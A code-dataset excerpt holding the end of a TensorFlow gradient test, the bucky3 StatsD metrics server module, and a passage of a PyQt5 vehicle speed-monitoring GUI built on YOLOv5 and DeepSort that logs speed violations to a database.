        assert tf.equal(grad1, grad2)
        # compose function with a as input (an expectation value is fed back
        # into the same QNode as a gate parameter)
        with tf.GradientTape() as tape:
            tape.watch([xt])
            a = f(xt)
            y = f(a)
            grad1 = tape.gradient(y, a)
        with tf.GradientTape() as tape:
            tape.watch([xt])
            a = f(xt)
            y = f(a)
            grad2 = tape.gradient(y, a)
        assert tf.equal(grad1, grad2)
        # compose function with b as input
        with tf.GradientTape() as tape:
            tape.watch([xt])
            b = g(xt)
            y = g(b)
            grad1 = tape.gradient(y, b)
        with tf.GradientTape() as tape:
            tape.watch([xt])
            b = g(xt)
            y = g(b)
            grad2 = tape.gradient(y, b)
        assert tf.equal(grad1, grad2)
| 35.994444 | 115 | 0.587861 |
de653c89ff97f8f9124be9ca82bdbb3f191e90bb | 13,244 | py | Python | bucky3/statsd.py | smarkets/bucky3 | 7bca15c28d3e55027b831923c43a811da9d62ecb | [
"Apache-2.0"
] | null | null | null | bucky3/statsd.py | smarkets/bucky3 | 7bca15c28d3e55027b831923c43a811da9d62ecb | [
"Apache-2.0"
] | null | null | null | bucky3/statsd.py | smarkets/bucky3 | 7bca15c28d3e55027b831923c43a811da9d62ecb | [
"Apache-2.0"
] | 1 | 2022-03-26T12:11:29.000Z | 2022-03-26T12:11:29.000Z | # -*- coding: utf-8 -
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
#
# Copyright 2011 Cloudant, Inc.
import time
import socket
import threading
import bucky3.module as module
class StatsDServer(module.MetricsSrcProcess, module.UDPConnector):
    """StatsD-compatible UDP metrics receiver.

    A background thread reads datagrams and aggregates samples into per-type
    dicts (timers, histograms, gauges, counters, sets); the main loop
    periodically flushes the aggregates as metrics.  Each dict has its own
    lock because the reader thread and the flush path touch them concurrently.
    """
    def __init__(self, *args):
        super().__init__(*args)
        self.sock = None
        # Each aggregate maps key -> (client_timestamp_or_None, payload).
        self.timers = {}
        self.timers_lock = threading.Lock()
        self.histograms = {}
        self.histograms_lock = threading.Lock()
        self.gauges = {}
        self.gauges_lock = threading.Lock()
        self.counters = {}
        self.counters_lock = threading.Lock()
        self.sets = {}
        self.sets_lock = threading.Lock()
        self.last_timestamp = 0
        self.metrics_received = 0
    def flush(self, system_timestamp):
        """Drain all aggregates into the metrics buffer and delegate to super."""
        self.enqueue_timers(system_timestamp)
        self.enqueue_histograms(system_timestamp)
        self.enqueue_counters(system_timestamp)
        self.enqueue_gauges(system_timestamp)
        self.enqueue_sets(system_timestamp)
        self.last_timestamp = system_timestamp
        return super().flush(system_timestamp)
    def init_cfg(self):
        """Load statsd-specific settings from the module configuration."""
        super().init_cfg()
        percentile_thresholds = self.cfg.get('percentile_thresholds', ())
        # Deduplicate and normalize thresholds to two decimals in (0, 100].
        self.percentile_thresholds = sorted(set(round(float(t), 2) for t in percentile_thresholds if t > 0 and t <= 100))
        self.histogram_selector = self.cfg.get('histogram_selector')
        self.timestamp_window = self.cfg.get('timestamp_window', 600)
    def read_loop(self):
        """Blocking UDP receive loop, run in its own thread."""
        sock = self.open_socket(bind=True)
        self.last_timestamp = round(time.time(), 3)
        while True:
            try:
                data, addr = sock.recvfrom(65535)
                self.handle_packet(data, addr)
            except (InterruptedError, socket.timeout):
                pass
    def loop(self):
        """Start the UDP reader thread, then run the standard module loop."""
        self.start_thread('UdpReadThread', self.read_loop)
        super().loop()
    def produce_self_report(self):
        """Extend the base self report with the number of samples received."""
        self_report = super().produce_self_report()
        self_report['metrics_received'] = self.metrics_received
        return self_report
    def enqueue_timers(self, system_timestamp):
        """Emit percentile statistics for each timer key and reset the timers.

        For each configured percentile, stats (count/rate/lower/upper/mean,
        plus stdev when count > 1) are computed over the smallest samples up
        to that percentile's index in the sorted list.
        """
        # NOTE(review): interval is 0 if flush runs twice with the same
        # timestamp, which would divide by zero below -- presumably the
        # scheduler guarantees a positive interval; confirm.
        interval = system_timestamp - self.last_timestamp
        bucket = self.cfg['timers_bucket']
        timestamp = system_timestamp if self.add_timestamps else None
        with self.timers_lock:
            for k, (cust_timestamp, v) in self.timers.items():
                v.sort()
                count = len(v)
                # (index, percentile) pairs; percentile 100 covers all samples.
                thresholds = ((count if t == 100 else (t * count) // 100, t) for t in self.percentile_thresholds)
                try:
                    next_i, next_t = next(thresholds)
                    vlen = vsum = vsum_squares = 0
                    # Single pass over sorted samples, emitting stats whenever
                    # a percentile boundary is crossed.
                    for i, x in enumerate(v):
                        vlen += 1
                        vsum += x
                        vsum_squares += x * x
                        while i >= next_i - 1:
                            mean = vsum / vlen
                            stats = {'count': vlen, 'count_ps': vlen / interval, 'lower': v[0], 'upper': x, 'mean': mean}
                            if vlen > 1:
                                var = (vsum_squares - 2 * mean * vsum + vlen * mean * mean) / (vlen - 1)
                                # FP rounding can lead to negative variance and in consequence complex stdev.
                                # I.e. three samples of [0.003, 0.003, 0.003]
                                var = max(var, 0)
                                stats['stdev'] = var ** 0.5
                            metadata = {'percentile': str(next_t)}
                            metadata.update(k)
                            self.buffer_metric(bucket, stats, cust_timestamp or timestamp, metadata)
                            next_i, next_t = next(thresholds)
                except StopIteration:
                    pass
            self.timers = {}
    def enqueue_histograms(self, system_timestamp):
        """Emit per-bucket statistics for each histogram key and reset them."""
        interval = system_timestamp - self.last_timestamp
        bucket = self.cfg['histograms_bucket']
        timestamp = system_timestamp if self.add_timestamps else None
        with self.histograms_lock:
            for k, (cust_timestamp, selector, buckets) in self.histograms.items():
                for histogram_bucket, (vlen, vsum, vsum_squares, vmin, vmax) in buckets.items():
                    mean = vsum / vlen
                    stats = {'count': vlen, 'count_ps': vlen / interval, 'lower': vmin, 'upper': vmax, 'mean': mean}
                    if vlen > 1:
                        var = (vsum_squares - 2 * mean * vsum + vlen * mean * mean) / (vlen - 1)
                        # Clamp: FP rounding can produce a tiny negative variance.
                        var = max(var, 0)
                        stats['stdev'] = var ** 0.5
                    metadata = {'histogram': str(histogram_bucket)}
                    metadata.update(k)
                    self.buffer_metric(bucket, stats, cust_timestamp or timestamp, metadata)
            self.histograms = {}
    def enqueue_sets(self, system_timestamp):
        """Emit the cardinality of each set key and reset the sets."""
        bucket = self.cfg['sets_bucket']
        timestamp = system_timestamp if self.add_timestamps else None
        with self.sets_lock:
            for k, (cust_timestamp, v) in self.sets.items():
                self.buffer_metric(bucket, {"count": len(v)}, cust_timestamp or timestamp, dict(k))
            self.sets = {}
    def enqueue_gauges(self, system_timestamp):
        """Emit the current value of each gauge key and reset the gauges."""
        bucket = self.cfg['gauges_bucket']
        timestamp = system_timestamp if self.add_timestamps else None
        with self.gauges_lock:
            for k, (cust_timestamp, v) in self.gauges.items():
                self.buffer_metric(bucket, {"value": float(v)}, cust_timestamp or timestamp, dict(k))
            self.gauges = {}
    def enqueue_counters(self, system_timestamp):
        """Emit count and per-second rate for each counter key, then reset."""
        interval = system_timestamp - self.last_timestamp
        bucket = self.cfg['counters_bucket']
        timestamp = system_timestamp if self.add_timestamps else None
        with self.counters_lock:
            for k, (cust_timestamp, v) in self.counters.items():
                stats = {
                    'rate': float(v) / interval,
                    'count': float(v)
                }
                self.buffer_metric(bucket, stats, cust_timestamp or timestamp, dict(k))
            self.counters = {}
    def handle_packet(self, data, addr=None):
        # Adding a bit of extra sauce so clients can send multiple samples in a single UDP packet.
        try:
            recv_timestamp, data = round(time.time(), 3), data.decode("ascii")
        except UnicodeDecodeError:
            # Non-ASCII payloads are silently dropped.
            return
        for line in data.splitlines():
            line = line.strip()
            if line:
                self.handle_line(recv_timestamp, line)
    def handle_line(self, recv_timestamp, line):
        """Parse a single statsd line and dispatch it by metric type."""
        # DataDog special packets for service check and events, ignore them
        if line.startswith('sc|') or line.startswith('_e{'):
            return
        try:
            cust_timestamp, line, metadata = self.handle_metadata(recv_timestamp, line)
        except ValueError:
            return
        if not line:
            return
        bits = line.split(":")
        if len(bits) < 2:
            return
        name = bits.pop(0)
        if not name.isidentifier():
            return
        key, metadata = self.handle_key(name, metadata)
        if not key:
            return
        # I'm not sure if statsd is doing this on purpose but the code allows for name:v1|t1:v2|t2 etc.
        # In the interest of compatibility, I'll maintain the behavior.
        for sample in bits:
            if "|" not in sample:
                continue
            fields = sample.split("|")
            valstr = fields[0]
            if not valstr:
                continue
            typestr = fields[1]
            ratestr = fields[2] if len(fields) > 2 else None
            try:
                if typestr == "ms" or typestr == "h":
                    self.handle_timer(cust_timestamp, key, metadata, valstr, ratestr)
                elif typestr == "g":
                    self.handle_gauge(cust_timestamp, key, metadata, valstr, ratestr)
                elif typestr == "s":
                    self.handle_set(cust_timestamp, key, metadata, valstr, ratestr)
                else:
                    # Any other type string is treated as a counter ("c").
                    self.handle_counter(cust_timestamp, key, metadata, valstr, ratestr)
                self.metrics_received += 1
            except ValueError:
                pass
    def handle_metadata(self, recv_timestamp, line):
        """Split off DogStatsD-style '|#k=v,...' tags; raise ValueError on bad input.

        Returns (custom_timestamp_or_None, metric_part_of_line, metadata_dict).
        """
        # http://docs.datadoghq.com/guides/dogstatsd/#datagram-format
        bits = line.split("|#", 1)  # We allow '#' in tag values, too
        cust_timestamp, metadata = None, {}
        if len(bits) < 2:
            return cust_timestamp, line, metadata
        for i in bits[1].split(","):
            if not i:
                continue
            # Due to how we parse the metadata, comma is the only illegal character
            # in tag values, everything else will be taken literally.
            # Prometheus and Influx modules handle escaping the special chars as needed.
            # There is no special char handling in carbon module at all, i.e. it is flawed.
            k, _, v = i.partition('=')
            if not k.isidentifier() or not v:
                raise ValueError()
            if k == 'timestamp':
                cust_timestamp = float(v)
                # Assume millis not secs if the timestamp >= 2^31
                if cust_timestamp > 2147483647:
                    cust_timestamp /= 1000
                # Reject client timestamps too far from the receive time.
                if abs(recv_timestamp - cust_timestamp) > self.timestamp_window:
                    raise ValueError()
                cust_timestamp = round(cust_timestamp, 3)
            elif k == 'bucket':
                if not v.isidentifier():
                    raise ValueError()
                metadata[k] = v
            else:
                metadata[k] = v
        return cust_timestamp, bits[0], metadata
    def handle_key(self, name, metadata):
        """Build a hashable, order-independent dict key from name + metadata."""
        metadata.update(name=name)
        key = tuple((k, metadata[k]) for k in sorted(metadata.keys()))
        return key, metadata
    def handle_timer(self, cust_timestamp, key, metadata, valstr, ratestr):
        """Append a timer sample; optionally also feed the histogram buckets."""
        val = float(valstr)
        with self.timers_lock:
            if key in self.timers:
                buf = self.timers[key][1]
                buf.append(val)
                self.timers[key] = cust_timestamp, buf
            else:
                self.timers[key] = cust_timestamp, [val]
        if self.histogram_selector is None:
            return
        with self.histograms_lock:
            histogram = self.histograms.get(key)
            if histogram is None:
                # First sample for this key: ask the configured selector for a
                # bucketing function; None means "no histogram for this metric".
                selector = self.histogram_selector(metadata)
                if selector is None:
                    return
                buckets = {}
            else:
                selector = histogram[1]
                buckets = histogram[2]
            bucket_name = selector(val)
            if bucket_name:
                bucket_stats = buckets.get(bucket_name)
                if bucket_stats:
                    vlen, vsum, vsum_squares, vmin, vmax = bucket_stats
                else:
                    vlen = vsum = vsum_squares = 0
                    vmin = vmax = val
                # Running (count, sum, sum of squares, min, max) per bucket.
                buckets[bucket_name] = (
                    vlen + 1, vsum + val, vsum_squares + val * val, min(val, vmin), max(val, vmax)
                )
                self.histograms[key] = cust_timestamp, selector, buckets
    def handle_gauge(self, cust_timestamp, key, metadata, valstr, ratestr):
        """Set a gauge; a leading '+'/'-' makes it a delta on the stored value."""
        val = float(valstr)
        delta = valstr[0] in "+-"
        with self.gauges_lock:
            if delta and key in self.gauges:
                self.gauges[key] = cust_timestamp, self.gauges[key][1] + val
            else:
                self.gauges[key] = cust_timestamp, val
    def handle_set(self, cust_timestamp, key, metadata, valstr, ratestr):
        """Add the raw value string to the uniqueness set for this key."""
        with self.sets_lock:
            if key in self.sets:
                buf = self.sets[key][1]
                buf.add(valstr)
                self.sets[key] = cust_timestamp, buf
            else:
                self.sets[key] = cust_timestamp, {valstr}
    def handle_counter(self, cust_timestamp, key, metadata, valstr, ratestr):
        """Accumulate a counter; '@rate' scales the sample up by 1/rate."""
        if ratestr and ratestr[0] == "@":
            rate = float(ratestr[1:])
            if rate > 0 and rate <= 1:
                val = float(valstr) / rate
            else:
                # Out-of-range sample rates invalidate the whole sample.
                return
        else:
            val = float(valstr)
        with self.counters_lock:
            if key in self.counters:
                val += self.counters[key][1]
            self.counters[key] = cust_timestamp, val
| 41.77918 | 121 | 0.553609 |
0824afd7e96bf3bf971d3da7c2e93bad5d917fea | 16,720 | py | Python | GUI/Monitoring.py | kyvipro113/Speed_Monitoring_System | 3ce877c87644bfe20a1d59f3cd6c0435c772e5c5 | [
"MIT"
] | null | null | null | GUI/Monitoring.py | kyvipro113/Speed_Monitoring_System | 3ce877c87644bfe20a1d59f3cd6c0435c772e5c5 | [
"MIT"
] | null | null | null | GUI/Monitoring.py | kyvipro113/Speed_Monitoring_System | 3ce877c87644bfe20a1d59f3cd6c0435c772e5c5 | [
"MIT"
] | null | null | null | from PyQt5.QtWidgets import QFrame
from GUI.Ui_Monitoring import Ui_Monitoring
from PyQt5 import QtWidgets
from PyQt5.QtCore import pyqtSlot, pyqtSignal, QThread, Qt, pyqtSlot
from PyQt5.QtGui import QImage, QPixmap
from PyQt5.QtWidgets import QFileDialog
import cv2
from pathlib import Path
import os.path
import numpy as np
import time
import sys
sys.path.insert(0, './yolov5')
from yolov5.models.experimental import attempt_load
from yolov5.utils.datasets import LoadImages, LoadStreams
from yolov5.utils.general import check_img_size, non_max_suppression, scale_coords, check_imshow
from yolov5.utils.torch_utils import select_device
from deep_sort_pytorch.utils.parser import get_config
from deep_sort_pytorch.deep_sort import DeepSort
import os
from pathlib import Path
import cv2
import torch
import torch.backends.cudnn as cudnn
import math
from SQL_Connection.SQLConnection import SQLConnection
import datetime
# Directory where cropped snapshots of violating vehicles are written.
path_save_violating_vehicle = "violating_vehicle/"
if not (os.path.isdir("violating_vehicle")):
    os.mkdir("violating_vehicle")
violation_time = {}  # track id -> datetime when the violation was first detected
SQL = SQLConnection()  # NOTE: opens the database connection at import time
palette = (2 ** 11 - 1, 2 ** 15 - 1, 2 ** 20 - 1)  # seeds for per-id box colors
pixels_per_meter = 1  # scene scale used by calculate_speed(); set from the UI
fps = 0  # module-level default; effective fps is computed inside the worker
fileName = ""  # stem of the selected video (or "webcam0" for the camera source)
videoFile = ""  # file name (stem + extension) of the selected video
carStartPosition = {}  # track id -> [x1, y1, x2, y2] at the start of a measuring window
carCurrentPosition = {}  # track id -> [x1, y1, x2, y2] at the end of a measuring window
speed = {}  # track id -> estimated speed in km/h
violating_vehicle = {}  # track id -> bbox of the frame where the violation was detected
violating_name = {}  # track id -> violation label ("Over Speed", "Parking", ...)
def bbox_rel(*xyxy):
    """Convert a corner-style box (x1, y1, x2, y2) of tensor scalars to
    center format, returning (x_center, y_center, width, height) as floats.
    """
    x1, y1, x2, y2 = (t.item() for t in xyxy[:4])
    left = min(x1, x2)
    top = min(y1, y2)
    width = abs(x1 - x2)
    height = abs(y1 - y2)
    return left + width / 2, top + height / 2, width, height
def compute_color_for_labels(label):
    """Deterministically map a track id to a BGR color tuple using the
    module-level `palette` seeds."""
    base = label ** 2 - label + 1
    return tuple(int((p * base) % 255) for p in palette)
def draw_boxes(img, bbox, identities=None, speed = {}, offset=(0, 0)):
    """Draw tracked bounding boxes, id labels and (when available) per-id
    speed text onto `img` in place, and return `img`.

    bbox: iterable of (x1, y1, x2, y2) boxes; identities: parallel sequence
    of track ids (0 is used when absent); speed: optional {id: km/h} mapping;
    offset: (dx, dy) shift applied to every box.
    NOTE: the mutable default `speed={}` is only read here, never mutated,
    so the usual shared-default pitfall does not bite.
    """
    for i, box in enumerate(bbox):
        x1, y1, x2, y2 = [int(i) for i in box]
        x1 += offset[0]
        x2 += offset[0]
        y1 += offset[1]
        y2 += offset[1]
        # box text and bar
        id = int(identities[i]) if identities is not None else 0
        color = compute_color_for_labels(id)
        label = '{}{:d}'.format("", id)
        t_size = cv2.getTextSize(label, cv2.FONT_HERSHEY_PLAIN, 2, 2)[0]
        cv2.rectangle(img, (x1, y1), (x2, y2), color, 3)
        # Filled background bar behind the id label.
        cv2.rectangle(
            img, (x1, y1), (x1 + t_size[0] + 3, y1 + t_size[1] + 4), color, -1)
        cv2.putText(img, label, (x1, y1 + t_size[1] + 4), cv2.FONT_HERSHEY_PLAIN, 2, [255, 255, 255], 2)
        if not (speed == {}):
            if id in speed:
                cv2.putText(img, str(speed[id]) + "km/h", (x1 + 30, y1 + t_size[1] + 20), cv2.FONT_HERSHEY_PLAIN, 4, [255, 255, 255], 2)
    return img
# True while a monitoring session is running; read by ThreadMonitoring.run()
# and toggled from the Monitoring widget's start/end handlers.
flag = False
def calculate_speed(startPosition, currentPosition, fps):
    """Estimate one vehicle's speed (km/h) from two bounding boxes taken one
    measuring window apart, and record violations into the module dicts.

    startPosition / currentPosition: [x1, y1, x2, y2] boxes; fps: effective
    frame rate between the two samples.  Side effect: scans *all* currently
    tracked vehicles and fills violating_vehicle / violating_name /
    violation_time for ids whose stored speed is out of the 30-150 range.
    """
    global pixels_per_meter
    # Box centers at the start and end of the measuring window.
    xG_start, yG_start = (startPosition[0] + startPosition[2]) / 2, (startPosition[1] + startPosition[3]) / 2
    xG_current, yG_current = (currentPosition[0] + currentPosition[2]) / 2, (currentPosition[1] + currentPosition[3]) / 2
    distance_in_pixels = math.sqrt(math.pow(xG_current - xG_start, 2) + math.pow(yG_current - yG_start, 2))
    distance_in_meters = distance_in_pixels / pixels_per_meter
    speed_in_meter_per_second = distance_in_meters * fps
    speed_in_kilometer_per_hour = speed_in_meter_per_second * 3.6
    if not speed == {}:
        for id in carCurrentPosition.keys():
            if id in speed:
                # Violation thresholds: below 30 km/h (incl. 0 = parking) or above 150.
                if(speed[id] < 30 or speed[id] > 150):
                    if id not in violating_vehicle:
                        violating_vehicle[id] = carCurrentPosition[id]
                        violation_time[id] = datetime.datetime.now()
                    if(speed[id] == 0):
                        violating_name[id] = "Parking"
                    if(speed[id] < 30 and speed[id] > 0):
                        violating_name[id] = "Under Speed"
                    if(speed[id] > 150):
                        violating_name[id] = "Over Speed"
                # NOTE(review): yG_start/yG_current describe the single vehicle
                # passed into this call, yet this check runs for every id in the
                # loop -- it can label unrelated vehicles "Opposite Lane".
                # Confirm whether this is intended before relying on the label.
                if(yG_start > 500 and yG_current < 50):
                    violating_name[id] = "Opposite Lane"
    return speed_in_kilometer_per_hour
def cleanDictSpeed():
    """Reset all per-session tracking state.

    Called after a monitoring session ends.  Clears the position/speed caches
    and ALL violation bookkeeping: track IDs restart from scratch on the next
    run, so any stale entry keyed by an old ID (label, timestamp, bbox) would
    be wrongly attributed to a newly tracked vehicle.
    """
    # `global` declarations are unnecessary here: the dicts are mutated in
    # place via .clear(), never rebound.
    speed.clear()
    carStartPosition.clear()
    carCurrentPosition.clear()
    violating_vehicle.clear()
    # Bug fix: these two were previously never cleared, leaking violation
    # labels/timestamps across sessions.
    violating_name.clear()
    violation_time.clear()
class ThreadMonitoring(QThread):  # Using thread for real-time detect and tracking
    """Worker thread: runs YOLOv5 detection + DeepSort tracking on a video or
    camera source, updates the module-level speed/violation state, emits each
    annotated frame as a QImage via `changePixmap`, and writes the annotated
    video to the output directory.  The module-level `flag` global acts as
    the run/stop switch.
    """
    changePixmap = pyqtSignal(QImage)
    def __init__(self, path = 0, parent=None):
        """path: video file path, '0' for the default camera, or a stream URL."""
        QThread.__init__(self, parent=parent)
        self.vid_src = path
    def setPath(self, path):
        """Change the input source before (re)starting the thread."""
        self.vid_src = path
    def run(self):
        """Thread body: load models, then loop over frames while `flag` is set."""
        global carStartPosition
        global carCurrentPosition
        out, source, weights, view_vid, save_vid, imgsz = "output", self.vid_src, "yolov5/weights/yolov5s.pt", True, True, 640
        webcam = source == '0' or source.startswith('rtsp') or source.startswith('http') or source.endswith('.txt')
        # initialize deepsort
        cfg = get_config()
        cfg.merge_from_file('deep_sort_pytorch/configs/deep_sort.yaml')
        deepsort = DeepSort(cfg.DEEPSORT.REID_CKPT,
                            max_dist=cfg.DEEPSORT.MAX_DIST, min_confidence=cfg.DEEPSORT.MIN_CONFIDENCE,
                            nms_max_overlap=cfg.DEEPSORT.NMS_MAX_OVERLAP, max_iou_distance=cfg.DEEPSORT.MAX_IOU_DISTANCE,
                            max_age=cfg.DEEPSORT.MAX_AGE, n_init=cfg.DEEPSORT.N_INIT, nn_budget=cfg.DEEPSORT.NN_BUDGET,
                            use_cuda=True)
        # Initialize
        device = select_device('') # Default CUDA
        half = device.type != 'cpu'  # half precision only supported on CUDA
        # Load model
        model = attempt_load(weights, map_location=device)  # load FP32 model
        stride = int(model.stride.max())  # model stride
        imgsz = check_img_size(imgsz, s=stride)  # check img_size
        if half:
            model.half()  # to FP16
        print(device.type)
        # Set Dataloader
        vid_writer, vid_path = None, None
        # Check if environment supports image displays
        if view_vid:
            view_vid = check_imshow()
        if webcam:
            cudnn.benchmark = True  # set True to speed up constant image size inference
            dataset = LoadStreams(source, img_size=imgsz, stride=stride)
        else:
            dataset = LoadImages(source, img_size=imgsz)
        # Run inference
        if device.type != 'cpu':
            model(torch.zeros(1, 3, imgsz, imgsz).to(device).type_as(next(model.parameters())))  # run once
        save_path = str(Path(out))
        # Count frame
        count_frame = 0
        start_time = 0
        end_time = 0
        while(flag):
            for frame_idx, (path, img, im0s, vid_cap) in enumerate(dataset):
                start_time = time.time()
                img = torch.from_numpy(img).to(device)
                img = img.half() if half else img.float()  # uint8 to fp16/32
                img /= 255.0  # 0 - 255 to 0.0 - 1.0
                # Stop requested from the UI: leave the frame loop.
                if not flag:
                    break
                if img.ndimension() == 3:
                    img = img.unsqueeze(0)
                # Skip the first 5 frames before starting the speed-measuring
                # window counter (presumably to let the tracker warm up).
                if(frame_idx >=5):
                    count_frame += 1
                # Inference
                # NOTE(review): `augment` is passed as '' where the model API
                # presumably expects a bool -- '' is falsy, so augmentation is
                # effectively off; confirm intent.
                pred = model(img, augment='')[0]
                # Apply NMS; classes [2, 5, 6] restrict detections to vehicles
                # per the model's class list (COCO ids) -- TODO confirm mapping.
                pred = non_max_suppression(pred, 0.4, 0.5, classes=[2, 5, 6], agnostic=False)
                # Process detections
                for i, det in enumerate(pred):  # detections per image
                    if webcam:  # batch_size >= 1
                        p, s, im0 = path[i], '%g: ' % i, im0s[i].copy()
                    else:
                        p, s, im0 = path, '', im0s
                    save_path = str(Path(out) / Path(videoFile))
                    if det is not None and len(det):
                        # Rescale boxes from img_size to im0 size
                        det[:, :4] = scale_coords(
                            img.shape[2:], det[:, :4], im0.shape).round()
                        bbox_xywh = []
                        confs = []
                        # Adapt detections to deep sort input format
                        for *xyxy, conf, cls in det:
                            x_c, y_c, bbox_w, bbox_h = bbox_rel(*xyxy)
                            obj = [x_c, y_c, bbox_w, bbox_h]
                            bbox_xywh.append(obj)
                            if conf.item() > 0.55:
                                confs.append([conf.item()])
                        xywhs = torch.Tensor(bbox_xywh)
                        confss = torch.Tensor(confs)
                        # Pass detections to deepsort
                        outputs = deepsort.update(xywhs, confss, im0)
                        end_time = time.time()
                        # Calculate FPS
                        if not (start_time == end_time):
                            fps = 1.0/ (end_time - start_time)
                        # draw boxes for visualization
                        if len(outputs) > 0:
                            bbox_xyxy = outputs[:, :4]
                            identities = outputs[:, -1]
                            # Calculate speed: sample every track's box at the
                            # first and second tick of the measuring window.
                            if(count_frame == 1):
                                car_ID = outputs[:, 4]
                                post_car = outputs[:, [0, 1, 2, 3]]
                                for ID in car_ID:
                                    post = np.where(car_ID == ID)
                                    carStartPosition[ID] = post_car[int(post[0]), :].tolist()
                            if(count_frame == 2):
                                car_ID = outputs[:, 4]
                                post_car = outputs[:, [0, 1, 2, 3]]
                                for ID in car_ID:
                                    post = np.where(car_ID == ID)
                                    carCurrentPosition[ID] = post_car[int(post[0]), :].tolist()
                                for ID in carStartPosition.keys():
                                    if(ID in carStartPosition and ID in carCurrentPosition):
                                        [x_s1, y_s1, x_s2, y_s2] = carStartPosition[ID]
                                        [x_c1, y_c1, x_c2, y_c2] = carCurrentPosition[ID]
                                        #carStartPosition[ID] = [x_c1, y_c1, x_c2, y_c2]
                                        # Each id's speed is computed once and cached.
                                        if ID not in speed:
                                            speed_car = calculate_speed([x_s1, y_s1, x_s2, y_s2], [x_c1, y_c1, x_c2, y_c2], fps=fps)
                                            speed[ID] = int(speed_car)
                                count_frame = 0
                            # Persist each newly detected violation: save a crop
                            # once per (video, id) and insert a DB row alongside it.
                            for id in violating_vehicle.keys():
                                img_crop = im0[violating_vehicle[id][1]:violating_vehicle[id][3], violating_vehicle[id][0]:violating_vehicle[id][2]]
                                if(img_crop.shape[0] > 0 and img_crop.shape[1]>0):
                                    if not os.path.isfile(path_save_violating_vehicle + "{}.{}.jpg".format(fileName, id)):
                                        cv2.imwrite(path_save_violating_vehicle + "{}.{}.jpg".format(fileName, id), img_crop)
                                        imgFile = fileName + "." + str(id) + "." + "jpg"
                                        sp = "{} km/h".format(speed[id])
                                        SQL.queryNoReturn("Insert Into ViolatingVehicle Values ('{}', '{}', '{}', '{}', '{}')".format(id, sp, violating_name[id], violation_time[id], imgFile))
                            draw_boxes(im0, bbox_xyxy, identities, speed=speed)
                    else:
                        # No detections this frame: age the tracks so stale ones expire.
                        deepsort.increment_ages()
                    # Stream results
                    if view_vid:
                        im0S = cv2.resize(im0, (850, 480))
                        rgbImage = cv2.cvtColor(im0S, cv2.COLOR_BGR2RGB)
                        h, w, ch = rgbImage.shape
                        bytesPerLine = ch * w
                        convertToQtFormat = QImage(rgbImage.data, w, h, bytesPerLine, QImage.Format_RGB888)
                        p = convertToQtFormat.scaled(850, 480, Qt.KeepAspectRatio)
                        self.changePixmap.emit(p)
                    if save_vid:
                        if vid_path != save_path:  # new video
                            vid_path = save_path
                            if isinstance(vid_writer, cv2.VideoWriter):
                                vid_writer.release()  # release previous video writer
                            if vid_cap:  # video
                                fps = vid_cap.get(cv2.CAP_PROP_FPS)
                                w = int(vid_cap.get(cv2.CAP_PROP_FRAME_WIDTH))
                                h = int(vid_cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
                            else:  # stream
                                fps, w, h = 30, im0.shape[1], im0.shape[0]
                            print(save_path)
                            save_path += '.mp4'
                            vid_writer = cv2.VideoWriter(save_path, cv2.VideoWriter_fourcc(*'mp4v'), fps, (w, h))
                            print(save_path)
                        vid_writer.write(im0)
class Monitoring(QFrame, Ui_Monitoring):
    """Main monitoring panel: lets the user pick a video/camera source plus a
    pixels-per-meter scale, and starts/stops the ThreadMonitoring worker that
    runs detection + tracking and streams annotated frames back to the UI.
    """

    def __init__(self, parent=None):
        QFrame.__init__(self, parent=parent)
        self.setupUi(self)
        self.comboInput.addItem("Video")
        self.comboInput.addItem("Camera")
        self.txtPPM.setText("1")
        self.btEnd.setEnabled(False)
        self.path = None  # selected video file path; None until the user picks one
        # Monitoring video thread; frames arrive through the changePixmap signal.
        self.threadMonitoring = ThreadMonitoring(self)
        self.threadMonitoring.changePixmap.connect(self.setImage)
        # Wire up the button events.
        self.btChooseVideo.clicked.connect(self.chooseVideo)
        self.btStart.clicked.connect(self.startMonitoring)
        self.btEnd.clicked.connect(self.endMonitoring)

    @pyqtSlot(QImage)
    def setImage(self, image):
        """Slot: display a frame emitted by the worker thread."""
        self.lbImg.setPixmap(QPixmap.fromImage(image))

    def alert(self, title, message):
        """Show a modal information message box."""
        msg = QtWidgets.QMessageBox()
        msg.setIcon(QtWidgets.QMessageBox.Information)
        msg.setText(message)
        msg.setWindowTitle(title)
        msg.exec_()

    def chooseVideo(self):
        """Open a file dialog and remember the chosen video path and name."""
        global fileName
        global videoFile
        try:
            options = QFileDialog.Options()
            options |= QFileDialog.DontUseNativeDialog
            video_path, _ = QFileDialog.getOpenFileName(None, "Choose Video", "","Video Files (*.mp4 *.avi);;All Files (*)", options = options)
            # Bug fix: getOpenFileName returns an empty string (not None) when
            # the user cancels, so test truthiness instead of `is not None`.
            if video_path:
                self.path = video_path
                fileName = Path(video_path).resolve().stem
                fileTail = os.path.splitext(video_path)[-1]
                videoFile = fileName + fileTail
                self.lbNameVideo.setText(videoFile)
        except Exception:
            # Best-effort: a failed dialog must never crash the UI.
            pass

    def startMonitoring(self):
        """Validate the pixels-per-meter input, then start the worker thread
        for the selected source (camera, or the previously chosen video)."""
        global flag
        global pixels_per_meter
        global fileName
        global videoFile
        ppm_text = self.txtPPM.text()
        if ppm_text:
            try:
                ppm_value = float(ppm_text)
            except ValueError:
                # Bug fix: non-numeric input used to raise and crash the
                # handler; treat it like an invalid (<= 0) value instead.
                ppm_value = 0
            if ppm_value > 0:
                pixels_per_meter = ppm_value
            else:
                # Bug fix: the message promises a default, so actually set it.
                pixels_per_meter = 1
                self.alert(title="Cảnh báo", message="Pixel trên met phải lớn hơn 0, \n Hệ thống sẽ cài đặt mặc định")
        else:
            pixels_per_meter = 1
        if self.comboInput.currentText() == "Camera":
            if not flag:
                fileName = "webcam0"
                videoFile = "Webcam0.mp4"
                flag = True
                # Bug fix: keep button states consistent with the video branch.
                self.btStart.setEnabled(False)
                self.btEnd.setEnabled(True)
                self.threadMonitoring.setPath(path="0")
                self.threadMonitoring.start()
        if self.path is None and self.comboInput.currentText() == "Video":
            self.alert(title="Cảnh báo", message="Không có video được chọn!")
        else:
            # `flag` is already True when the camera branch started the thread,
            # so this only runs for the video source.
            if not flag:
                self.btStart.setEnabled(False)
                self.btEnd.setEnabled(True)
                flag = True
